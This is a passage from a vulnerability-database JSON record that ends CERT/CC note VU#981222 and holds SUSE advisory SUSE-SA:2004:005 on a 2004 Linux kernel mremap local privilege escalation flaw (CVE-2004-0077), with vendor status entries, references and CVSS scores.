vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### MontaVista Software Unknown\n\nUpdated: March 11, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### NEC Corporation Unknown\n\nUpdated: March 11, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### Nokia Unknown\n\nUpdated: March 11, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### Novell Unknown\n\nUpdated: March 11, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### OpenBSD Unknown\n\nUpdated: March 11, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### SCO Unknown\n\nUpdated: March 11, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### Sequent Unknown\n\nUpdated: March 11, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### Sony Corporation Unknown\n\nUpdated: March 11, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### Unisys Unknown\n\nUpdated: March 11, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### Wind River Systems Inc. Unknown\n\nUpdated: March 11, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\nView all 41 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://www.kernel.org/>\n * <http://isec.pl/vulnerabilities/isec-0014-mremap-unmap.txt>\n * <http://www.securityfocus.com/archive/1/354284>\n * <http://www.securityfocus.com/archive/1/355781>\n * <http://www.securityfocus.com/bid/9686>\n * <http://xforce.iss.net/xforce/xfdb/15244>\n * <http://secunia.com/advisories/10897/>\n\n### Acknowledgements\n\nThis vulnerability was researched and reported by Paul Starzetz of iSEC.\n\nThis document was written by Art Manion.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2004-0077](<http://web.nvd.nist.gov/vuln/detail/CVE-2004-0077>) \n---|--- \n**Severity Metric:** | 26.52 \n**Date Public:** | 2004-02-18 \n**Date First Published:** | 2004-03-10 \n**Date Last Updated: ** | 2004-03-25 17:10 UTC \n**Document Revision: ** | 26 \n", "modified": "2004-03-25T17:10:00", "published": "2004-03-10T00:00:00", "id": "VU:981222", "href": "https://www.kb.cert.org/vuls/id/981222", "type": "cert", "title": "Linux kernel mremap(2) system call does not properly check return value from do_munmap() function", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T12:42:50", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0010", "CVE-2003-0991", "CVE-2004-0003", "CVE-2004-0075", "CVE-2004-0077"], "description": "Another bug in the Kernel's do_mremap() function, which is unrelated to the bug fixed in SuSE-SA:2004:001, was found by Paul Starzetz. The do_mremap() function of the Linux Kernel is used to manage Virtual Memory Areas (VMAs) which includes moving, removing and resizing of memory areas. To remove old memory areas do_mremap() uses the function du_munmap() without checking the return value. By forcing do_munmap() to return an error the memory management of a process can be tricked into moving page table entries from one VMA to another. The destination VMA may be protected by a different ACL which enables a local attacker to gain write access to previous read-only pages. The result will be local root access to the system.", "edition": 1, "modified": "2004-02-18T22:19:53", "published": "2004-02-18T22:19:53", "id": "SUSE-SA:2004:005", "href": "http://lists.opensuse.org/opensuse-security-announce/2004-02/msg00002.html", "title": "local privilege escalation in Linux Kernel", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
